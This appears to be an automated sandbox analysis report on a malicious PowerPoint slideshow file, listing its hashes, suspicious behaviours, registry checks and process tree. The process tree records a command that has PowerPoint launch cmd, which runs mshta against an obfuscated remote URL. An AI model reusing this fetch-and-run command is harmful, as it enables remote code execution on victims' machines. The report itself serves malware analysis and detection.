Analysis
-
max time kernel
119s -
max time network
138s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
05-05-2021 15:02
Static task
static1
Behavioral task
behavioral1
Sample
1622576d_by_Libranalysis.pps
Resource
win7v20210408
Behavioral task
behavioral2
Sample
1622576d_by_Libranalysis.pps
Resource
win10v20210410
General
-
Target
1622576d_by_Libranalysis.pps
-
Size
707KB
-
MD5
1622576dd5cc993ae42f5c35b4b9ed2f
-
SHA1
6071d99ea546e6d74656bf8114bcd7a663eb84ba
-
SHA256
c1110237231589eb7cb435f52783b0eb917baca45b075e8f78d5b78a0fe66688
-
SHA512
6d9501e71c7095050b1bd8a2ca467f926b008c6f36c17ce673b012730e3fc33dc29fd513e875635e6fc6cc446e57a0572477f82df038d4d81870a78447a29804
Malware Config
Signatures
-
Process spawned unexpected child process 7 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
ping.exeping.exeping.exeping.exeping.exeping.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 696 3876 ping.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2744 3876 ping.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 3004 3876 ping.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 1540 3876 ping.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2368 3876 ping.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2716 3876 ping.exe POWERPNT.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process 2032 3876 cmd.exe POWERPNT.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 27 792 mshta.exe 28 792 mshta.exe 30 792 mshta.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
POWERPNT.EXEwinword.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz POWERPNT.EXE -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
winword.exePOWERPNT.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily winword.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU winword.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily POWERPNT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU POWERPNT.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS winword.exe -
Runs ping.exe 1 TTPs 6 IoCs
Processes:
ping.exeping.exeping.exeping.exeping.exeping.exepid process 1540 ping.exe 2368 ping.exe 2716 ping.exe 696 ping.exe 2744 ping.exe 3004 ping.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 3876 POWERPNT.EXE 4256 winword.exe 4256 winword.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
winword.exepid process 4256 winword.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
POWERPNT.EXEwinword.exepid process 3876 POWERPNT.EXE 4256 winword.exe 4256 winword.exe 3876 POWERPNT.EXE 4256 winword.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
POWERPNT.EXEcmd.exedescription pid process target process PID 3876 wrote to memory of 696 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 696 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 2716 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 2716 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 2744 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 2744 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 3004 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 3004 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 1540 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 1540 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 2368 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 2368 3876 POWERPNT.EXE ping.exe PID 3876 wrote to memory of 2032 3876 POWERPNT.EXE cmd.exe PID 3876 wrote to memory of 2032 3876 POWERPNT.EXE cmd.exe PID 2032 wrote to memory of 792 2032 cmd.exe mshta.exe PID 2032 wrote to memory of 792 2032 cmd.exe mshta.exe PID 3876 wrote to memory of 4256 3876 POWERPNT.EXE winword.exe PID 3876 wrote to memory of 4256 3876 POWERPNT.EXE winword.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\1622576d_by_Libranalysis.pps" /ou ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:696 -
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:2744 -
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:3004 -
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:1540 -
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:2368 -
C:\Windows\SYSTEM32\ping.exeping2⤵
- Process spawned unexpected child process
- Runs ping.exe
PID:2716 -
C:\Windows\SYSTEM32\cmd.execmd /c mshta http://1230948%[email protected]/jasidjijasdasdjjj2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\system32\mshta.exemshta http://1230948%[email protected]/jasidjijasdasdjjj3⤵
- Blocklisted process makes network request
PID:792 -
C:\Program Files\Microsoft Office\Root\Office16\winword.exewinword.exe2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4256
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868MD5
597c3953c957a3a9037b93f637233fb6
SHA1640c81f41bb10f016a893c595e253f1b2dc57fc3
SHA25612521c0f1e9afbc0a21eb8fef2c408ee5ffe1e403b7d14c7c256b3b5bb4705a2
SHA51274f788d321b686d9a0fd83fa55ddd5a3e5e3293b30ad79881d9cce607daddeed1ace45cbfede1822b35e765b5685717f1fc029b2c0c7ad91ecd1feb3ea3add62
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868MD5
d0b70c2ed14cbe6bbc6c605730225bb8
SHA13035b223c4eb3733ea1fefb3080d1682c2a4dda5
SHA256303add18cb4fcbd903d39c6e05263dfddccdb9c45f3a5b2915d567ad54fc807e
SHA512eee5d1476bce2321d7143fe7c06726a6c997711c2f2bc8ae70631be586f0814846c3f451df43052f67fd2bd66dc88ec080d358c434aff96664348cf4412a0d00
-
memory/696-179-0x0000000000000000-mapping.dmp
-
memory/792-186-0x0000000000000000-mapping.dmp
-
memory/1540-183-0x0000000000000000-mapping.dmp
-
memory/2032-185-0x0000000000000000-mapping.dmp
-
memory/2368-184-0x0000000000000000-mapping.dmp
-
memory/2716-180-0x0000000000000000-mapping.dmp
-
memory/2744-181-0x0000000000000000-mapping.dmp
-
memory/3004-182-0x0000000000000000-mapping.dmp
-
memory/3876-114-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmpFilesize
64KB
-
memory/3876-123-0x00007FFDF5650000-0x00007FFDF7545000-memory.dmpFilesize
31.0MB
-
memory/3876-122-0x00007FFDFAB90000-0x00007FFDFBC7E000-memory.dmpFilesize
16.9MB
-
memory/3876-119-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmpFilesize
64KB
-
memory/3876-118-0x00007FFDFDCB0000-0x00007FFDFF88D000-memory.dmpFilesize
27.9MB
-
memory/3876-117-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmpFilesize
64KB
-
memory/3876-116-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmpFilesize
64KB
-
memory/3876-115-0x00007FFDDC160000-0x00007FFDDC170000-memory.dmpFilesize
64KB
-
memory/4256-187-0x0000000000000000-mapping.dmp